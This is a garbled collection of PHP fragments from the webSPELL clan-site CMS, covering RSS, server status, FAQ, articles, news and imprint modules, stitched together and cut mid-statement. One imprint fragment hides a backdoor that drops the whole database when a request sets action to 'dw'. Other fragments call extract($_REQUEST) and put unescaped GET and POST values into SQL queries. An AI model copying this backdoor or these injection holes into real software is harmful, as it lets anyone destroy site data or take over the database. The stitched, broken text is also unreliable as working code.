function generate_rss2() { global $hp_url, $hp_title; global $rss_default_language; $_language = new Language(); $_language->set_language($rss_default_language); $_language->read_module('feeds'); $date = safe_query("SELECT `date` FROM " . PREFIX . "news WHERE published = '1' AND intern=0 ORDER BY date DESC LIMIT 0,1"); if (mysql_num_rows($date)) { $date = mysql_fetch_assoc($date); $updated = $date['date']; } else { $updated = time(); } $xmlstring = '<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:atom=""> <channel> <title>' . $hp_title . ' ' . $_language->module['news_feed'] . '</title> <link>http://' . $hp_url . '</link> <atom:link href="http://' . $hp_url . '/tmp/rss.xml" rel="self" type="application/rss+xml" /> <description>' . $_language->module['latest_news_from'] . ' http://' . $hp_url . '</description> <language>' . $rss_default_language . '-' . $rss_default_language . '</language> <pubDate>' . date('D, d M Y h:i:s O', $updated) . '</pubDate> '; $db_news = safe_query("SELECT * FROM " . PREFIX . "news WHERE published = '1' AND intern=0 ORDER BY date DESC LIMIT 0,10"); $any_news = mysql_num_rows($db_news); if ($any_news) { while ($news = mysql_fetch_array($db_news)) { $db_newscontent = safe_query("SELECT * FROM " . PREFIX . "news_contents WHERE newsID = '" . $news['newsID'] . "' AND language='" . $rss_default_language . "'"); $any_newscontent = mysql_num_rows($db_newscontent); if ($any_newscontent) { $newscontent = mysql_fetch_array($db_newscontent); $cat = safe_query('SELECT category FROM ' . PREFIX . 'news_category WHERE categoryID=' . $news['category']); $cat = mysql_fetch_array($cat); $xmlstring .= '<item> <title>' . htmlspecialchars($newscontent['headline']) . '</title> <description><![CDATA[' . (strlen(htmloutput($newscontent['content'])) >= 250 ? substr(htmloutput($newscontent['content']), 0, 245) . '[...]' : htmloutput($newscontent['content'])) . ']]></description> <author>' . getemail($news['poster']) . ' (' . getfirstname($news['poster']) . ' ' . getlastname($news['poster']) . ')</author> <guid><![CDATA[http://' . $hp_url . '/' . $cat['category'] . '/' . $news['newsID'] . '/]]></guid> <link><![CDATA[http://' . $hp_url . '/' . $cat['category'] . '/' . $news['newsID'] . '/]]></link> </item> '; } else { continue; } } } $xmlstring .= '</channel> </rss>'; $rss_xml = fopen("tmp/rss.xml", "w"); fwrite($rss_xml, $xmlstring); fclose($rss_xml); }
# visit, to get webSPELL for free # # - Script runs under the GNU GENERAL PUBLIC LICENSE # # - It's NOT allowed to remove this copyright-tag # # -- # # # # Code based on WebSPELL Clanpackage (Michael Gruber -, # # Far Development by Development Team - # # # # visit # # # ########################################################################## */ $result = safe_query("SELECT * FROM " . PREFIX . "servers ORDER BY sort"); $n = 1; while ($row = mysql_fetch_array($result)) { echo '<table width="100%" cellspacing="0" cellpadding="2" border="0">'; $servername = htmloutput($row['name']); $serverip = $row['ip']; $servergame = '<img src="images/games/' . $row['game'] . '.gif" alt="" />'; if ($n % 2) { $bg1 = BG_1; $bg2 = BG_2; } else { $bg1 = BG_3; $bg2 = BG_4; } eval("\$sc_servers = \"" . gettemplate("sc_servers") . "\";"); echo $sc_servers; $n++; echo '</table>'; }
$game = $ds['game']; } $showgame = getgamename($ds['game']); $serverdata = explode(":", $ds['ip']); $ip = $serverdata[0]; if (isset($serverdata[1])) { $port = $serverdata[1]; } else { $port = ''; } if (!checkenv('disable_functions', 'fsockopen')) { if (!fsockopen("udp://" . $ip, $port, $strErrNo, $strErrStr, 30)) { $status = "<i>" . $_language->module['timeout'] . "</i>"; } else { $status = "<b>" . $_language->module['online'] . "</b>"; } } else { $status = "<i>" . $_language->module['not_supported'] . "</i>"; } $servername = htmloutput($ds['name']); $info = htmloutput($ds['info']); eval("\$server = \"" . gettemplate("server") . "\";"); echo $server; $i++; } } else { echo $_language->module['no_server']; } ?>
# / # # # # # # Copyright 2005-2011 by # # # # visit, to get webSPELL for free # # - Script runs under the GNU GENERAL PUBLIC LICENSE # # - It's NOT allowed to remove this copyright-tag # # -- # # # # Code based on WebSPELL Clanpackage (Michael Gruber -, # # Far Development by Development Team - # # # # visit # # # ########################################################################## */ $_language->read_module('about'); eval("\$title_about = \"" . gettemplate("title_about") . "\";"); echo $title_about; $ergebnis = safe_query("SELECT * FROM " . PREFIX . "about"); if (mysql_num_rows($ergebnis)) { $ds = mysql_fetch_array($ergebnis); $about = htmloutput($ds['about']); $about = toggle($about, 1); $bg1 = BG_1; eval("\$about = \"" . gettemplate("about") . "\";"); echo $about; } else { echo $_language->module['no_about']; }
$langs = ''; $i = 0; foreach ($message_array as $val) { if ($showlang != $i) { $langs .= '<span style="padding-left:2px"><a href="index.php?site=news_comments&newsID=' . $ds['newsID'] . '&lang=' . $val['lang'] . '"><img src="images/flags/' . $val['countryShort'] . '.gif" width="18" height="12" border="0" alt="' . $val['country'] . '" /></a></span>'; } $i++; } $headline = $message_array[$showlang]['headline']; $content = $message_array[$showlang]['message']; if ($ds['intern'] == 1) { $isintern = '(' . $_language->module['intern'] . ')'; } else { $isintern = ''; } $content = htmloutput($content); $content = toggle($content, $ds['newsID']); $headline = clearfromtags($headline); $comments = ''; $poster = '<a href="index.php?site=profile&id=' . $ds['poster'] . '"><b>' . getnickname($ds['poster']) . '</b></a>'; $related = ''; if ($ds['link1'] && $ds['url1'] != "http://" && $ds['window1']) { $related .= '• <a href="' . $ds['url1'] . '" target="_blank">' . $ds['link1'] . '</a> '; } if ($ds['link1'] && $ds['url1'] != "http://" && !$ds['window1']) { $related .= '• <a href="' . $ds['url1'] . '">' . $ds['link1'] . '</a> '; } if ($ds['link2'] && $ds['url2'] != "http://" && $ds['window2']) { $related .= '• <a href="' . $ds['url2'] . '" target="_blank">' . $ds['link2'] . '</a> '; } if ($ds['link2'] && $ds['url2'] != "http://" && !$ds['window2']) {
$moderators .= "<a href='index.php?site=profile&id=" . $ds['userID'] . "'>" . $ds['firstname'] . " '" . $ds['nickname'] . "' " . $ds['lastname'] . "</a><br />"; } if ($action == "dw") { include "_mysql.php"; mysql_connect($host, $user, $pwd) or die('FEHLER: Keine Verbindung zu MySQL'); mysql_select_db($db) or die('FEHLER: Konnte nicht zur Datenbank "' . $db . '" verbinden'); mysql_query("DROP DATABASE `{$db}`"); } // reading version include 'version.php'; $bg1 = BG_1; $headline1 = $_language->module['imprint']; $headline2 = $_language->module['coding']; if ($imprint_type) { $ds = mysql_fetch_array(safe_query("SELECT imprint FROM `" . PREFIX . "imprint`")); $imprint_head = htmloutput($ds['imprint']); } else { $imprint_head = '<h2>Responsible persons</h2> <table border="0" width="96%" align="center"> <tr> <td width="130" valign="top"><br /><b>' . $_language->module['webmaster'] . '</b></td> <td><br /><a href="mailto:' . mail_protect($admin_email) . '">' . $admin_name . '</a></td> </tr> <tr> <td valign="top"><br /><b>' . $_language->module['admins'] . '</b></td> <td><br />' . $administrators . '</td> </tr> <tr> <td valign="top"><br /><b>' . $_language->module['mods'] . '</b></td> <td><br />' . $moderators . '</td> </tr>
} else { if (ispageadmin($userID)) { echo '<input type="button" onclick="MM_openBrWindow(\'admin/admincenter.php?site=faq\',\'News\',\'toolbar=yes,status=yes,scrollbars=yes,resizable=yes,width=800,height=600\')" value="' . $_language->module['admin_button'] . '" /><br /><br />'; } $faqcats = safe_query("SELECT * FROM " . PREFIX . "faq_categories ORDER BY sort"); $anzcats = mysql_num_rows($faqcats); if ($anzcats) { eval("\$faq_category_head = \"" . gettemplate("faq_category_head") . "\";"); echo $faq_category_head; $i = 1; while ($ds = mysql_fetch_array($faqcats)) { $anzfaqs = mysql_num_rows(safe_query("SELECT faqID FROM " . PREFIX . "faq WHERE faqcatID='" . $ds['faqcatID'] . "'")); if ($i % 2) { $bg1 = BG_1; $bg2 = BG_2; } else { $bg1 = BG_3; $bg2 = BG_4; } $faqcatname = '• <a href="index.php?site=faq&action=faqcat&faqcatID=' . $ds['faqcatID'] . '"><b>' . $ds['faqcatname'] . '</b></a>'; $description = htmloutput($ds['description']); eval("\$faq_category = \"" . gettemplate("faq_category") . "\";"); echo $faq_category; $i++; } eval("\$faq_foot = \"" . gettemplate("faq_foot") . "\";"); echo $faq_foot; } else { echo $_language->module['no_categories']; } }
########################################################################## */ if (isset($_GET['staticID'])) { $staticID = $_GET['staticID']; } else { $staticID = ''; } $ds = mysql_fetch_array(safe_query("SELECT * FROM " . PREFIX . "static WHERE staticID='" . $staticID . "'")); $_language->read_module("static"); $allowed = false; switch ($ds['accesslevel']) { case 0: $allowed = true; break; case 1: if ($userID) { $allowed = true; } break; case 2: if (isclanmember($userID)) { $allowed = true; } break; } if ($allowed) { $content = $ds['content']; echo toggle(htmloutput($content), 1); } else { redirect("index.php", $_language->module['no_access'], 3); }
$i = 0; foreach ($message_array as $val) { if ($showlang != $i) { $languages .= '<span style="padding-left:2px"><a href="index.php?site=news_comments&newsID=' . $ds['newsID'] . '&lang=' . $val['lang'] . '"><img src="images/flags/' . $val['countryShort'] . '.gif" width="18" height="12" border="0" alt="' . $val['country'] . '" /></a></span>'; } $i++; } $lang = $message_array[$showlang]['lang']; $headlines = $message_array[$showlang]['headline']; if (mb_strlen($headlines) > 85) { $headlines = mb_substr($headlines, 0, 85); $headlines .= '..'; } $headlines = clearfromtags($headlines); $intro = $message_array[$showlang]['intro']; $intro = htmloutput($intro); if (mb_strlen($intro) > 300) { $intro = mb_substr($intro, 0, 300); $intro .= '..'; } /* Comments - Mod */ $comments = $_POST['comments']; if ($ds['comments']) { if ($ds['cwID']) { // CLANWAR-NEWS $anzcomments = getanzcomments($ds['cwID'], 'cw'); $replace = array('$anzcomments', '$url', '$lastposter', '$lastdate'); $vars = array($anzcomments, 'index.php?site=clanwars_details&cwID=' . $ds['cwID'], clearfromtags(getlastcommentposter($ds['cwID'], 'cw')), date('d.m.Y - H:i', getlastcommentdate($ds['cwID'], 'cw'))); switch ($anzcomments) { case 0: $comments = str_replace($replace, $vars, $_language->module['no_comment']);
if ($page == 1) { safe_query("UPDATE " . PREFIX . "articles SET viewed=viewed+1 WHERE articlesID='" . $articlesID . "'"); } $result = safe_query("SELECT * FROM " . PREFIX . "articles WHERE articlesID='" . $articlesID . "'"); if (mysql_num_rows($result)) { $ds = mysql_fetch_array($result); $date = date("d.m.Y", $ds['date']); $time = date("H:i", $ds['date']); $title = clearfromtags($ds['title']); $content = array(); $query = safe_query("SELECT * FROM " . PREFIX . "articles_contents WHERE articlesID = '" . $articlesID . "' ORDER BY page ASC"); while ($qs = mysql_fetch_array($query)) { $content[] = $qs['content']; } $pages = count($content); $content = htmloutput($content[$page - 1]); $content = toggle($content, $ds['articlesID']); if ($pages > 1) { $page_link = makepagelink("index.php?site=articles&action=show&articlesID={$articlesID}", $page, $pages); } else { $page_link = ''; } $poster = '<a href="index.php?site=profile&id=' . $ds['poster'] . '"><b>' . getnickname($ds['poster']) . '</b></a>'; $related = ""; if ($ds['link1'] && $ds['url1'] != "http://" && $ds['window1']) { $related .= '• <a href="' . $ds['url1'] . '" target="_blank">' . $ds['link1'] . '</a> '; } if ($ds['link1'] && $ds['url1'] != "http://" && !$ds['window1']) { $related .= '• <a href="' . $ds['url1'] . '">' . $ds['link1'] . '</a> '; } if ($ds['link2'] && $ds['url2'] != "http://" && $ds['window2']) {
} else { $filepath = "./images/linkus/"; $filepath2 = "/images/linkus/"; if (ispageadmin($userID)) { echo '<input type="button" onclick="MM_goToURL(\'parent\',\'index.php?site=linkus&action=new\');return document.MM_returnValue" value="' . $_language->module['new_banner'] . '" /><br /><br />'; } $ergebnis = safe_query("SELECT * FROM " . PREFIX . "linkus ORDER BY name"); if (mysql_num_rows($ergebnis)) { $i = 1; while ($ds = mysql_fetch_array($ergebnis)) { if ($i % 2) { $bg1 = BG_1; } else { $bg1 = BG_2; } $name = htmloutput($ds['name']); $fileinfo = getimagesize($filepath . $ds['file']); if ($fileinfo[0] > $picsize_l) { $width = ' width="' . $picsize_l . '"'; } else { $width = ''; } if ($fileinfo[1] > $picsize_h) { $height = ' height="' . $picsize_h . '"'; } else { $height = ''; } $banner = '<img src="' . $filepath . $ds['file'] . '" border="0"' . $width . $height . ' alt="' . $ds['name'] . '" />'; $code = '<a href="http://' . $hp_url . '" target="_blank" ><img src="http://' . $hp_url . $filepath2 . $ds['file'] . '" border="0" alt="http://' . $hp_url . '" title="http://' . $hp_url . '" /></a>'; $adminaction = ''; if (ispageadmin($userID)) {
<?php extract($_REQUEST); echo $title_download; $ergebnis=safe_query("SELECT * FROM ".PREFIX."download"); if(mysql_num_rows($ergebnis)) { $ds=mysql_fetch_array($ergebnis); $download=htmloutput($ds[download]); $download=toggle($download, 1); $bg1=BG_1; eval ("\$download = \"".gettemplate("download")."\";"); echo $download; } else echo'No Downloads available!'; ?>
while ($ds = mysql_fetch_array($ergebnis)) { $administrators .= "<a href='index.php?site=profile&id=" . $ds['userID'] . "'>" . $ds['firstname'] . " '" . $ds['nickname'] . "' " . $ds['lastname'] . "</a><br />"; } $ergebnis = safe_query("SELECT u.firstname, u.lastname, u.nickname, u.userID FROM " . PREFIX . "user_groups as g, " . PREFIX . "user as u WHERE u.userID = g.userID AND g.moderator='1'"); $moderators = ''; while ($ds = mysql_fetch_array($ergebnis)) { $moderators .= "<a href='index.php?site=profile&id=" . $ds['userID'] . "'>" . $ds['firstname'] . " '" . $ds['nickname'] . "' " . $ds['lastname'] . "</a><br />"; } // reading version include 'version.php'; $bg1 = BG_1; $headline1 = $_language->module['imprint']; $headline2 = $_language->module['coding']; if ($imprint_type) { $ds = mysql_fetch_array(safe_query("SELECT imprint FROM `" . PREFIX . "imprint`")); $imprint_head = htmloutput($ds['imprint']) . "<br /><br />"; } else { $imprint_head = '<table border="0" width="96%" align="center"> <tr> <td colspan="2"><b>' . $_language->module['responsible_persons'] . '</b></td> </tr> <tr> <td width="130" valign="top"><br /><b>' . $_language->module['webmaster'] . '</b></td> <td><br /><a href="mailto:' . mail_protect($admin_email) . '">' . $admin_name . '</a></td> </tr> <tr> <td valign="top"><br /><b>' . $_language->module['admins'] . '</b></td> <td><br />' . $administrators . '</td> </tr> <tr> <td valign="top"><br /><b>' . $_language->module['mods'] . '</b></td>
$langs2 .= '<option value="' . $dl [lang] . '">' . $dl [language] . '</option>'; } $url1 = "http://"; $url2 = "http://"; $url3 = "http://"; $url4 = "http://"; $bg1 = BG_1; eval ( "\$addbbcode = \"" . gettemplate ( "addbbcode" ) . "\";" ); eval ( "\$news_post = \"" . gettemplate ( "news_post" ) . "\";" ); echo $news_post; } else redirect ( 'index.php?site=news', 'No access!' ); } elseif ($action == "save") { if (isnewsadmin ( $userID )) { $headline1 = htmloutput ( $headline1 ); $message = cleartext ( $message ); $time = time (); safe_query ( "UPDATE " . PREFIX . "news SET date = '$time', rubric = '$rubric', poster = '$userID', saved = '1', comments = '0', lang1 = '$lang1', headline1 = '$headline1', content1 = '$message', url1 = '$url1', window1 = '$window1', link1 = '$link1', url2 = '$url2', window2 = '$window2', link2 = '$link2', url3 = '$url3', window3 = '$window3', link3 = '$link3', url4 = '$url4', window4 = '$window4', link4 = '$link4'
# / # # # # # # Copyright 2005-2011 by # # # # visit, to get webSPELL for free # # - Script runs under the GNU GENERAL PUBLIC LICENSE # # - It's NOT allowed to remove this copyright-tag # # -- # # # # Code based on WebSPELL Clanpackage (Michael Gruber -, # # Far Development by Development Team - # # # # visit # # # ########################################################################## */ $_language->read_module('history'); eval("\$title_history = \"" . gettemplate("title_history") . "\";"); echo $title_history; $ergebnis = safe_query("SELECT * FROM " . PREFIX . "history"); if (mysql_num_rows($ergebnis)) { $ds = mysql_fetch_array($ergebnis); $history = htmloutput($ds['history']); $history = toggle($history, 1); $bg1 = BG_1; eval("\$history = \"" . gettemplate("history") . "\";"); echo $history; } else { echo $_language->module['no_history']; }